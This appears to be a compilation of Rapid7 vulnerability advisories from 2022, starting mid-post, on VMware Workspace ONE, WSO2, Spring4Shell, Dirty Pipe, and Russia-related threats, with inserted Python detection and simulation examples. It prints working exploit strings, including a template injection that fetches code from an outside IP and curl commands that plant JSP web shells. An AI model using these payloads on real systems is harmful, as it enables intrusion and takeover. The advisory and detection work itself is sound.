InsightVM and Nexpose customers can assess their exposure to CVE-2022-1388 with an authenticated vulnerability check in the May 5, 2022 content release. This release also includes authenticated vulnerability checks for additional CVEs in F5’s May 2022 security advisory.


Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/

Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954

On April 6, 2022, VMware published VMSA-2022-0011, which detailed multiple security vulnerabilities. The most severe of these is CVE-2022-22954, a critical remote code execution vulnerability affecting VMware’s Workspace ONE Access and Identity Manager solutions. The vulnerability arises from a server-side template injection flaw and has a CVSSv3 base score of 9.8. Successful exploitation allows an unauthenticated attacker with network access to the web interface to execute an arbitrary shell command as the VMware user.

Affected products:

  • VMware Workspace ONE Access (Access) 20.10.0.0 – 20.10.0.1, 21.08.0.0 – 21.08.0.1
  • VMware Identity Manager (vIDM) 3.3.3 – 3.3.6

VMware updated their advisory to note active exploitation in the wild on April 12, 2022; a day later, security news outlet Bleeping Computer indicated that several public proof-of-concept exploits were being used in the wild to drop coin miners on vulnerable systems. More recently, security firm Morphisec published analysis of attacks that exploited CVE-2022-22954 to deploy reverse HTTPS backdoors. Public proof-of-concept exploit code is available and fits in a tweet (credit to researchers wvu and Udhaya Prakash).

Rapid7’s Project Heisenberg detected scanning/exploitation activity on 2022-04-13 and again on 2022-04-22. A total of 14 requests were observed across ports 80, 98, 443, 4443.

[Graphic: Project Heisenberg observations of CVE-2022-22954 scanning/exploitation activity on 2022-04-13 and 2022-04-22]

Scanning/exploitation strings observed:

  • /catalog-portal/ui/oauth/verify
  • /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/hosts")}
  • /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("wget -U "Hello 1.0" -qO - http://106[.]246[.]224[.]219/one")}
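The strings above are Freemarker template injection: the deviceUdid parameter instantiates freemarker.template.utility.Execute and hands it a shell command. The following is an added example (not part of the Rapid7 post and not VMware code) that URL-decodes requests to the vulnerable endpoint, recognises that payload shape, and pulls out the command and any URLs it fetches, which is what a responder feeds into triage. The log-line shape (client IP, method, request target) is an assumption, and the sample lines are constructed from the strings listed above.

```python
# Added example: decode and triage CVE-2022-22954 probes of the kind observed
# by Project Heisenberg. Not from the Rapid7 post; the request-line shape
# "<ip> <method> <target>" is an assumption and the samples are constructed.
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

VULN_PATH = "/catalog-portal/ui/oauth/verify"

# ${"freemarker.template.utility.Execute"?new()("<command>")}
# The command is captured greedily so nested, unescaped quotes (as in the
# wget probe observed above) still come out whole.
EXEC_RE = re.compile(
    r'\$\{\s*"freemarker\.template\.utility\.Execute"\s*\?new\(\)\s*\(\s*"(?P<cmd>.*)"\s*\)\s*\}',
    re.IGNORECASE | re.DOTALL,
)
URL_RE = re.compile(r"https?://[^\s\"']+")

# Constructed sample requests modelled on the observed strings above.
SAMPLE_REQUESTS = [
    "103.42.196.67 GET /catalog-portal/ui/oauth/verify",
    "5.157.38.50 GET /catalog-portal/ui/oauth/verify?error=&deviceUdid="
    "%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cat%20%2Fetc%2Fhosts%22%29%7D",
    '94.74.123.228 GET /catalog-portal/ui/oauth/verify?error=&deviceUdid='
    '${"freemarker.template.utility.Execute"?new()("wget -U "Hello 1.0" -qO - http://106.246.224.219/one")}',
    "10.0.0.5 GET /catalog-portal/ui/login",
]


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo percent-encoding until it stops changing, so a double-encoded
    payload cannot slip past the pattern match."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_request(line: str) -> Optional[dict]:
    """Classify one request line.

    Returns None for requests that do not touch the vulnerable endpoint;
    otherwise a finding with verdict 'probe' (endpoint only) or 'exploit'
    (template-injection payload present), plus the command and any URLs.
    """
    try:
        src_ip, method, target = line.split(" ", 2)
    except ValueError:
        return None
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    finding = {"src_ip": src_ip, "method": method, "verdict": "probe",
               "cmd": None, "urls": []}
    for values in parse_qs(parts.query, keep_blank_values=True).values():
        for value in values:
            match = EXEC_RE.search(fully_decode(value))
            if match:
                finding["verdict"] = "exploit"
                finding["cmd"] = match.group("cmd")
                finding["urls"] = URL_RE.findall(match.group("cmd"))
    return finding


def triage(lines):
    """Findings for every line that hit the vulnerable endpoint, in order."""
    return [f for f in (analyze_request(ln) for ln in lines) if f]


if __name__ == "__main__":
    for finding in triage(SAMPLE_REQUESTS):
        print(finding)
```

Run as a script it prints one finding per request that touched the endpoint; the extracted URLs are the values worth blocking or hunting for in proxy logs. The decoding loop matters because parse_qs only undoes one layer of percent-encoding.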

Attacker IP addresses:
103[.]42[.]196[.]67
5[.]157[.]38[.]50
54[.]38[.]103[.]1 (NOTE: according to this French government website, this IP address is benign)
94[.]74[.]123[.]228
96[.]243[.]27[.]61
107[.]174[.]218[.]172
170[.]210[.]45[.]163
173[.]212[.]229[.]216

These nodes appear to be members of generic botnets. Rapid7’s Heisenberg network has observed many of them involved in the same campaigns as noted in the above graphic, as well as Log4Shell exploitation attempts.

Mitigation guidance

VMware customers should patch their Workspace ONE Access and Identity Manager installations immediately, without waiting for a regular patch cycle to occur. VMware has instructions here on patching and applying workarounds. VMware has an FAQ available on this advisory here.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2022-22954 with an authenticated vulnerability check for Unix-like systems. (Note that VMware Workspace ONE Access is only able to be deployed on Linux from 20.x onward.)


Opportunistic Exploitation of WSO2 CVE-2022-29464

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/04/22/opportunistic-exploitation-of-wso2-cve-2022-29464/

Opportunistic Exploitation of WSO2 CVE-2022-29464

On April 18, 2022, MITRE published CVE-2022-29464, an unrestricted file upload vulnerability affecting various WSO2 products. WSO2 followed with a security advisory explaining that the vulnerability allowed unauthenticated, remote attackers to execute arbitrary code in the following products:

  • API Manager
  • Identity Server
  • Identity Server Analytics
  • Identity Server as Key Manager
  • Enterprise Integrator

A technical writeup and proof-of-concept exploit by @hakivvi quickly followed on April 20. The proof of concept uploads a malicious .jsp to /fileupload/toolsAny on the WSO2 product’s web server. The .jsp is a web shell, and due to a directory traversal issue affecting the uploaded file’s name, the attacker can write it to a location from which they can then send it commands. The attack is not restricted to .jsp files — other researchers, such as our old friend William Vu, have demonstrated exploitation with a .war file.

Exploitation is quite easy. The following, modeled after both the original PoC and Vu’s, uploads a simple jsp web shell that the attacker will be able to use by visiting https://target:9443/authenticationendpoint/r7.jsp:

echo '<%@ page import="java.io.*" %><% Process p = Runtime.getRuntime().exec(request.getParameter("cmd"),null,null); %>' | curl -kv -F ../../../../repository/deployment/server/webapps/authenticationendpoint/r7.jsp=@- https://10.0.0.20:9443/fileupload/toolsAny

Rapid7’s Managed Detection and Response (MDR) team has observed this vulnerability being opportunistically exploited in the wild. Attackers appear to be staying close to the original proof-of-concept exploit and are dropping web shells and coin miners on exploited targets. Victim systems include both Windows and Linux installations of the aforementioned WSO2 products.

Rapid7 recommends remediating this vulnerability immediately per the instructions in WSO2’s advisory. If remediation is not possible, remove installations from the public internet as soon as possible. Inspect your installation for web shells (.jsp and .class): For example, the original proof of concept will drop the webshell in /authenticationendpoint/ which, when using API Manager on Windows, can be found in C:\Program Files\WSO2\API Manager\3.2.0\repository\deployment\server\webapps\authenticationendpoint. Additionally, examine the server’s http_access log for requests to /fileupload/toolsAny as a possible indication of malicious behavior:

10.0.0.2 - - [22/Apr/2022:15:45:22 -0400] POST /fileupload/toolsAny HTTP/1.1 200 31 - curl/7.74.0 0.016
10.0.0.2 - - [22/Apr/2022:15:48:46 -0400] POST //fileupload/toolsAny HTTP/1.1 200 31 - python-requests/2.25.1 0.000
10.0.0.2 - - [22/Apr/2022:15:49:13 -0400] POST /fileupload/toolsAny HTTP/1.1 200 32 - python-requests/2.25.1 0.000
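Two checks follow as an added example; this is neither WSO2 code nor part of the Rapid7 post. The first shows why the upload is exploitable: the multipart file name is joined to the upload directory without confining the result, so the PoC’s ../../../../repository/... name lands inside a deployed webapp, and a confined version is shown beside it. The second sweeps http_access lines for POSTs to /fileupload/toolsAny and also catches the //fileupload/toolsAny variant in the log excerpt above, which a naive string match misses. Assumptions: the install root follows the post’s Windows layout (written with forward slashes), the upload directory is a hypothetical staging directory four levels below it so that the PoC’s four .. segments reach repository/, and the log lines are constructed from the ones above.

```python
# Added example for CVE-2022-29464 (not WSO2 code, not from the Rapid7 post).
# INSTALL follows the post's Windows layout; UPLOAD_DIR is an assumed staging
# directory chosen four levels deep so the PoC's "../../../../" reaches
# repository/. SAMPLE_LOG is constructed from the http_access lines above.
import posixpath
import re

INSTALL = "C:/Program Files/WSO2/API Manager/3.2.0"
UPLOAD_DIR = INSTALL + "/tmp/work/upload/stage"      # assumption, see above
WEBAPPS = INSTALL + "/repository/deployment/server/webapps"

POC_NAME = "../../../../repository/deployment/server/webapps/authenticationendpoint/r7.jsp"


def unsafe_upload_path(filename: str) -> str:
    """Vulnerable pattern: trust the client-supplied name and join it."""
    return posixpath.normpath(posixpath.join(UPLOAD_DIR, filename))


def safe_upload_path(filename: str) -> str:
    """Hardened: reject absolute names, then prove the normalised result is
    still under UPLOAD_DIR (this catches any '..' that climbs out)."""
    name = filename.replace("\\", "/")
    if name.startswith("/") or re.match(r"^[A-Za-z]:", name):
        raise ValueError("absolute file name rejected: " + filename)
    target = posixpath.normpath(posixpath.join(UPLOAD_DIR, name))
    if posixpath.commonpath([UPLOAD_DIR, target]) != UPLOAD_DIR:
        raise ValueError("file name escapes upload directory: " + filename)
    return target


def is_confined(filename: str) -> bool:
    """True when safe_upload_path accepts the name."""
    try:
        safe_upload_path(filename)
        return True
    except ValueError:
        return False


# http_access line shape from the post:
#   10.0.0.2 - - [22/Apr/2022:15:45:22 -0400] POST /fileupload/toolsAny HTTP/1.1 200 31 - curl/7.74.0 0.016
LOG_RE = re.compile(
    r"^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] (?P<method>[A-Z]+) (?P<target>\S+) \S+ (?P<status>\d{3})"
)

SAMPLE_LOG = [  # constructed, modelled on the lines in the post
    "10.0.0.2 - - [22/Apr/2022:15:45:22 -0400] POST /fileupload/toolsAny HTTP/1.1 200 31 - curl/7.74.0 0.016",
    "10.0.0.2 - - [22/Apr/2022:15:48:46 -0400] POST //fileupload/toolsAny HTTP/1.1 200 31 - python-requests/2.25.1 0.000",
    "10.0.0.7 - - [22/Apr/2022:15:50:01 -0400] GET /authenticationendpoint/r7.jsp?cmd=whoami HTTP/1.1 200 12 - curl/7.74.0 0.002",
    "10.0.0.9 - - [22/Apr/2022:15:52:10 -0400] GET /carbon/admin/login.jsp HTTP/1.1 200 5120 - Mozilla/5.0 0.004",
]


def normalize_request_path(target: str) -> str:
    """Strip the query string and collapse repeated slashes before comparing.
    posixpath.normpath alone keeps a leading '//' (POSIX allows it), which is
    exactly the variant a plain '/fileupload/toolsAny' grep misses."""
    path = target.split("?", 1)[0]
    path = re.sub(r"/{2,}", "/", path)
    return posixpath.normpath(path)


def flag_upload_requests(log_lines):
    """(client IP, timestamp, status) for every POST to the upload servlet."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if m["method"] == "POST" and normalize_request_path(m["target"]).lower() == "/fileupload/toolsany":
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits


if __name__ == "__main__":
    print("unsafe :", unsafe_upload_path(POC_NAME))
    try:
        safe_upload_path(POC_NAME)
    except ValueError as err:
        print("safe   :", err)
    for hit in flag_upload_requests(SAMPLE_LOG):
        print("upload :", hit)
```

The confinement check is the one to keep: stripping ../ sequences or rejecting a blocklist of characters is brittle, whereas normalising the joined path and then proving it still starts with the upload directory works for any name the client sends.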

Additionally, dropped war files will likely be exploded in the webapps directory (e.g. C:\Program Files\WSO2\API Manager\3.2.0\repository\deployment\server\webapps). The deployment may create entries such as the following in the wso2carbon log:

TID: [-1234] [r7] [2022-04-22 15:51:32,609]  INFO {org.wso2.carbon.webapp.mgt.TomcatGenericWebappsDeployer} - Deployed webapp: StandardEngine[Catalina].StandardHost[localhost].StandardContext[/r7].File[C:\PROGRA~1\WSO2\APIMAN~1\32E445~1.0\bin\..\repository\deployment\server\webapps\r7.war]

Rapid7 customers

Rapid7 InsightIDR customers already have detection rules in place that can identify activity around the exploitation of this vulnerability. Customers should consider reviewing the rule action and priority of the following detection rules. Teams should be ready to investigate any alerts generated from these rules. For Rapid7 MDR customers, the MDR team is monitoring these alerts and will notify you if suspicious activity is detected in your environment.

  • Suspicious Process – Python Downloading and Executing Script
  • Attacker Technique – URL Passed To BitsAdmin
  • Attacker Technique – CertUtil With URLCache Flag
  • Attacker Technique – PowerShell Download Cradles

The Rapid7 Threat Detection and Response team also added the following rule to identify malicious activity specifically related to this exploit:

  • Suspicious Process – WSO2 Product Launches Suspicious Process (added 2022-04-22 19:19 UTC)

We are actively working on development of a vulnerability check for InsightVM and Nexpose customers and will update this blog with further information as it is available.


Update on Spring4Shell’s Impact on Rapid7 Solutions and Systems

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/

Update on Spring4Shell’s Impact on Rapid7 Solutions and Systems

We have been continuously monitoring for Spring4Shell exploit attempts in our environment and have been urgently investigating the implications for our corporate and production systems. We are actively remediating vulnerabilities as we find them and monitoring for any anomalous activity in our environment.

We will update this page as we learn more. At this time, customers do not need to take any action.

Further reading and recommendations

Our Emergent Threat Response team has put together a detailed blog post with general guidance about how to mitigate and remediate Spring4Shell. We will continue updating that post as we learn more about Spring4Shell and new remediation and mitigation approaches.


Spring4Shell: Zero-Day Vulnerability in Spring Framework

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/

Spring4Shell: Zero-Day Vulnerability in Spring Framework

If you are like many in the cybersecurity industry, any mention of a zero-day in an open-source software (OSS) library may cause a face-palm or audible groans, especially given the fast-follow from Log4Shell. While discovery and research is evolving, we’re posting the facts we’ve gathered and updating guidance as new information becomes available.

What Rapid7 customers can expect

Our team is continuing to investigate and validate additional information about this vulnerability and its impact. This is a quickly evolving incident, and we are researching development of both assessment capabilities for our vulnerability management and application security solutions and options for preventive controls. As additional information becomes available, we will evaluate the feasibility of vulnerability checks, attack modules, detections, and Metasploit modules.

Our team will be updating this blog continually. Our next update will be at 9 PM EDT on March 30, 2022.

Introduction

On March 30, 2022, rumors began to circulate about an unpatched remote code execution (RCE) vulnerability in Spring Framework when a Chinese-speaking researcher published a GitHub commit that contained proof-of-concept (PoC) exploit code. The exploit code targeted a zero-day vulnerability in the Spring Core module of the Spring Framework. Spring is maintained by VMware (spring.io) and is used by many Java-based enterprise software frameworks. The proof of concept, which appeared to allow unauthenticated attackers to execute code on target systems, was quickly deleted.

A lot of confusion followed for several reasons:

  • The researcher’s original technical writeup needed to be translated.
  • The vulnerability (and proof of concept) isn’t exploitable with out-of-the-box installations of Spring Framework. The application has to use specific functionality, which we explain below.
  • A completely different unauthenticated RCE vulnerability was published yesterday (March 29, 2022) for Spring Cloud, which led some in the community to conflate the two unrelated vulnerabilities.

Rapid7’s research team has confirmed the zero-day vulnerability is real and provides unauthenticated remote code execution. Proof-of-concept exploits exist, but it’s currently unclear which real-world applications use the vulnerable functionality. Depending on how widely that functionality is used, this could result in widespread exploitation or in very little exploitation at all.

Recreating exploitation

The vulnerability appears to affect handler methods that use the @RequestMapping annotation and take a POJO (Plain Old Java Object) parameter. Here is an example we hacked into a Spring Framework MVC demonstration:

package net.javaguides.springmvc.helloworld.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.InitBinder;
import org.springframework.web.bind.annotation.RequestMapping;

import net.javaguides.springmvc.helloworld.model.HelloWorld;

/**
 * @author Ramesh Fadatare
 */
@Controller
public class HelloWorldController {

	@RequestMapping("/rapid7")
	public void vulnerable(HelloWorld model) {
	}
}

Here we have a controller (HelloWorldController) that, when loaded into Tomcat, will handle HTTP requests to http://name/appname/rapid7. The function that handles the request is called vulnerable and has a POJO parameter of type HelloWorld. Here, HelloWorld is stripped down, but a POJO can be quite complicated if need be:

package net.javaguides.springmvc.helloworld.model;

public class HelloWorld {
	private String message;
}

And that’s it. That’s the entire exploitable condition, from at least Spring Framework versions 4.3.0 through 5.3.15. (We have not explored further back than 4.3.0.)

If we compile the project and host it on Tomcat, we can then exploit it with the following curl command. Note the following uses the exact same payload used by the original proof of concept created by the researcher (more on the payload later):

curl -v -d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-SNAPSHOT/rapid7

This payload drops a password-protected web shell called tomcatwar.jsp in the Tomcat ROOT directory. It looks like this:

- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } -

Attackers can then invoke commands. Here is an example of executing whoami to get albinolobster:

[Screenshot: running whoami through the dropped web shell returns albinolobster]

The Java version does appear to matter. Testing on OpenJDK 1.8.0_312 fails, but OpenJDK 11.0.14.1 works.

About the payload

The payload we’ve used is specific to Tomcat servers. It uses a technique that was popular as far back as 2014 and alters the Tomcat server’s logging properties via ClassLoader. The payload simply redirects the logging logic to the ROOT directory and drops the file + payload. A good technical writeup can be found here.

This is just one possible payload and will not be the only one. We’re certain that malicious class-loading payloads will appear quickly.
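To make the mechanism concrete, here is an added example (it is neither the leaked PoC nor Rapid7 code) of what the property path class.module.classLoader.resources.context.parent.pipeline.first.* does once the data binder walks it down to Tomcat’s AccessLogValve: the five form fields become the valve’s pattern, suffix, directory, prefix and fileDateFormat, and the next request is “logged” into webapps/ROOT/tomcatwar.jsp. A small model of the valve binds the same five fields and renders one log line, which reproduces the shell text quoted above, including the - where the %{c1}i, %{c2}i and %{suffix}i request headers were not supplied. Assumptions: the valve model handles only %{name}i header lookups and literal text, its starting values are typical server.xml settings, and the header values Runtime, <% and %> are inferred from the shell text (the header names come from the pattern itself).

```python
# Added example (not the leaked PoC, not Rapid7 code): model the effect of the
# Spring4Shell curl body on Tomcat's AccessLogValve. Assumptions: only
# %{name}i lookups and literal text are rendered; the valve's starting
# values are typical server.xml settings; header values are inferred.
import re
from urllib.parse import parse_qsl, urlencode

PREFIX = "class.module.classLoader.resources.context.parent.pipeline.first."

# The pattern from the curl command above, decoded.
SHELL_PATTERN = (
    '%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = '
    '%{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); '
    'int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ '
    'out.println(new String(b)); } } %{suffix}i'
)

# Same five fields as the curl -d body, re-encoded here instead of copied.
CURL_BODY = urlencode({
    PREFIX + "pattern": SHELL_PATTERN,
    PREFIX + "suffix": ".jsp",
    PREFIX + "directory": "webapps/ROOT",
    PREFIX + "prefix": "tomcatwar",
    PREFIX + "fileDateFormat": "",
})


class AccessLogValveModel:
    """Stand-in for org.apache.catalina.valves.AccessLogValve; only the
    properties the payload touches are modelled."""

    def __init__(self):
        self.pattern = "common"
        self.suffix = ".txt"
        self.directory = "logs"
        self.prefix = "localhost_access_log"
        self.fileDateFormat = ".yyyy-MM-dd"

    def apply_form_field(self, key: str, value: str) -> bool:
        """Mimic Spring's data binder walking the property path: any field
        under PREFIX becomes a setter call on the valve. True if applied."""
        if not key.startswith(PREFIX):
            return False
        setattr(self, key[len(PREFIX):], value)
        return True

    def log_file_name(self) -> str:
        # Stand-in for SimpleDateFormat(fileDateFormat) applied to "today";
        # an empty fileDateFormat means no date segment at all.
        date_part = ".2022-03-30" if self.fileDateFormat else ""
        return f"{self.directory}/{self.prefix}{date_part}{self.suffix}"

    def render(self, request_headers: dict) -> str:
        """%{name}i is the request-header lookup; the valve writes '-' for a
        header that is absent, which is why the quoted shell shows '-'."""
        return re.sub(r"%\{([^}]+)\}i",
                      lambda m: request_headers.get(m.group(1), "-"),
                      self.pattern)


def simulate(body: str, request_headers: dict):
    """Bind the form body into a fresh valve; return (file name, line written)."""
    valve = AccessLogValveModel()
    for key, value in parse_qsl(body, keep_blank_values=True):
        valve.apply_form_field(key, value)
    return valve.log_file_name(), valve.render(request_headers)


if __name__ == "__main__":
    print(simulate(CURL_BODY, {}))
    print(simulate(CURL_BODY, {"c1": "Runtime", "c2": "<%", "suffix": "%>"}))
```

The first call reproduces the - placeholders seen in the dropped file; the second shows how a follow-up request carrying those three headers turns the same pattern into a complete JSP. Splitting <%, Runtime and %> out into headers is what keeps the form body free of strings a simple filter would catch.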

Mitigation guidance

This zero-day vulnerability is unpatched and has no CVE assigned as of March 30, 2022. The Spring documentation for DataBinder explicitly notes:

… [T]here are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.

Therefore, one line of defense would be to modify source code of custom Spring applications to ensure those field guardrails are in place. Organizations that use third-party applications susceptible to this newly discovered weakness cannot take advantage of this approach.

If your organization has a web application firewall (WAF) available, profiling any affected Spring-based applications to see what strings can be used in WAF detection rulesets would help prevent malicious attempts to exploit this weakness.

Until a patch is available, and if an organization is unable to use the above mitigations, one failsafe option is to model processes executions on systems that run these Spring-based applications and then monitor for anomalous, “post-exploitation” attempts. These should be turned into alerts and acted upon immediately via incident responders and security automation. One issue with this approach is the potential for false alarms if the modeling was not comprehensive enough.

Vulnerability disambiguation

There has been significant confusion about the zero-day vulnerability we discuss in this blog post because an unrelated vulnerability in another Spring project was published yesterday (March 29, 2022). That vulnerability, CVE-2022-22963, affects Spring Cloud Function, which is not in Spring Framework. Spring released versions 3.1.7 and 3.2.3 to address CVE-2022-22963. CVE-2022-22963 is completely unrelated to the zero-day RCE under investigation in this blog post.

Further, yet another vulnerability CVE-2022-22950 was assigned on March 28th. A fix was released on the same day. To keep things confusing, this medium-severity vulnerability (which can cause a DoS condition) DOES affect Spring Framework versions 5.3.0 to 5.3.16. This CVE is completely unrelated to the zero-day RCE under investigation in this blog post.


CVE-2022-0847: Arbitrary File Overwrite Vulnerability in Linux Kernel

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2022/03/09/cve-2022-0847-arbitrary-file-overwrite-vulnerability-in-linux-kernel/

  • CVE: CVE-2022-0847
  • Disclosure: Original disclosure
  • AttackerKB: AttackerKB
  • IVM Content: March 9, 2022
  • Patching Urgency: When practical
  • Blog’s Last Update: March 9, 2022 5:30 PM EST

CVE-2022-0847: Arbitrary File Overwrite Vulnerability in Linux Kernel

On March 7, 2022, CM4all security researcher Max Kellermann published technical details on CVE-2022-0847, an arbitrary file overwrite vulnerability in versions 5.8+ of the Linux kernel. Nicknamed “Dirty Pipe,” the vulnerability arises from incorrect Unix pipe handling, where unprivileged processes can corrupt read-only files. Successful exploitation allows local attackers to escalate privileges by modifying or overwriting typically inaccessible files — potentially including root passwords and SUID binaries.

CVE-2022-0847 affects Linux kernel versions since 5.8. Read Rapid7’s full technical analysis of the vulnerability in AttackerKB, including PoC and patch analysis.

While a CVSS score is not yet available, CVE-2022-0847 will likely carry a “High” severity rating rather than a “Critical” one, given that exploitation requires local access as an authenticated user. Multiple public exploits are available, including a proof of concept from the original disclosure and a Metasploit module. We are not aware of any reports of exploitation in the wild as of March 9, 2022.

This is a “patch, but no need to panic” situation. With that said, a few factors make this bug stand out a bit more than the average local privilege escalation (LPE) vuln. First and foremost, this is a simple attack to execute once initial access has been obtained, and it offers adversaries broad avenues for privileged operations after sensitive files (like root passwords) have been modified. Security researchers have also demonstrated that in some cases, public exploit code can be used to escape containers in that files modified inside the container also get modified on the host. Finally, the lingering specter of Log4Shell means that there may be a higher chance that attackers already have local access required to execute a privilege escalation attack on Linux systems.

Updates to Linux distributions have been trickling out. Organizations should apply the latest patches as soon as they are available and reboot systems.

Rapid7 customers

Upcoming content releases for InsightVM and Nexpose customers will provide checks for CVE-2022-0847 as supported Linux vendors publish distribution-specific security advisories and updated packages. Checks for Debian and Ubuntu are expected March 9, with SUSE to follow later in the week. Red Hat has not yet published any errata at this time.


Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/

Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?

Rapid7 is monitoring the escalating conflict in Ukraine, and we have provided a blog on the various attack vectors organizations may see, as well as guidance on mitigations and remediations.

To assist with your preparation and response efforts, Rapid7 is continuously integrating the most up-to-date threat intelligence, both consumed and curated, into our products. That intelligence monitors for new attack vectors so that InsightIDR can alert on attacker behaviors associated with various Advanced Persistent Threat (APT) groups.

If you are a Managed Detection & Response (MDR) customer, our global SOC teams are monitoring your environment 24/7 with a high degree of diligence, and as standard procedure, any verified suspicious activity will be investigated and reported to you with expediency. Considering the current crisis, we have placed a special emphasis on the most relevant APT groups, and we are closely monitoring a wide breadth of sources to make use of any newly created and verified indicators.

Keeping software patched against known vulnerabilities is an important first line of defense against attackers. On January 11, 2022, the Cybersecurity & Infrastructure Security Agency (CISA) published Alert AA22-011A: Understanding and Mitigating Russian State-Sponsored Cyber Threats to US Critical Infrastructure, listing several vulnerabilities known to be exploited by Russian threat actors.

InsightVM and Nexpose have checks for the CVEs called out in this alert. These vulnerabilities are included in InsightVM’s Threat Feed Dashboard (see the Assets With Actively Targeted Vulnerabilities card and the Most Common Actively Targeted Vulnerabilities card), along with other vulnerabilities known to be exploited in the wild.


Staying Secure in a Global Cyber Conflict

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/

Staying Secure in a Global Cyber Conflict

Now that Russia has begun its armed invasion of Ukraine, we should expect increasing risks of cybersecurity attacks and incidents, either as spillover from cyberattacks targeting Ukraine or direct attacks against actors supporting Ukraine.

Any state-sponsored Russian attacks aiming to support the Russian invasion of Ukraine, or to retaliate for US, NATO, or other foreign measures taken in response to the Russian invasion of Ukraine, are most likely to be destructive or disruptive in nature rather than aiming to steal data. This blog discusses the types of attacks organizations may see — including distributed denial of service (DDoS), website defacements, and the use of ransomware or destructive malware — and recommends steps for their mitigation or remediation.

As we have stated before, we do not believe organizations need to panic. But as per guidance from numerous governments, we do believe it is wise to be extra vigilant at this time. Rapid7 will continue to monitor the cybersecurity risks, both internally and for our Managed Detection and Response (MDR) customers as the situation evolves. We will post updates as relevant and suggest subscription to our blog to see them as they are posted.

Malware

One of the most concerning possibilities is the risk of a destructive malware attack on the US, NATO members, or other foreign countries. This could take the form of a direct attack or spillover from an attack on Ukraine, such as the 2017 NotPetya operation that targeted Ukraine and spread to other parts of the globe. Cybersecurity researchers have just discovered a new data wiping malware, dubbed HermeticWiper (AKA KillDisk.NCV), that infected hundreds of Ukrainian machines in the last two months. This seems to be a custom-written malware that corrupts the Master Boot Record (MBR), resulting in boot failure. This malware, like NotPetya, is intended to be destructive and will cripple the assets that it infects.

As always, the best malware prevention is to avoid infection in the first place — a risk we can minimize by ensuring that assets are up to date and use strong access controls, including multi-factor authentication. Additionally, it is crucial to have an incident response plan in place for the worst-case scenario, as well as a business continuity plan — including failover infrastructure if possible — for business-critical assets.

DDoS

There have already been reports of DDoS attacks on Ukrainian websites, and Russia has historically used DDoS in support of operations against other former Soviet republics, such as Georgia. Given this context, it is plausible that state-sponsored Russian actors would use DDoS if they choose to retaliate in response to measures taken against Russia for the invasion of Ukraine, such as sanctions or cyber operations from NATO countries.

While DDoS does not receive the same level of attention as some other forms of attack, it can still have significant impacts to business operations. DDoS mitigations can include reduction of attack surface area via Content Distribution Networks or load balancers, as well as the use of Access Control Lists and firewalls to drop traffic coming from attacker nodes.

Phishing campaigns

Russian state-sponsored actors are also well known for engaging in spear-phishing attacks, specifically with compromised valid accounts. Defenders should ensure strong spam filtering and attachment scanning is in place. Educating end users of the dangers of phishing and regularly running phishing campaigns will also help mitigate this issue.

State-sponsored, APT-style groups are not the only relevant threats. In times of crisis, it is common to see phishing attacks linking to malicious websites masquerading as news, aid groups, or other seemingly relevant content. Opportunistic scammers and other bad actors will attempt to take advantage of our human nature when curiosity, anxiety, and desire to help can make people less suspicious. Remain vigilant and avoid clicking unknown links or opening attachments — basic cyber hygiene that can be forgotten when emotions run high.

Brute-force attacks

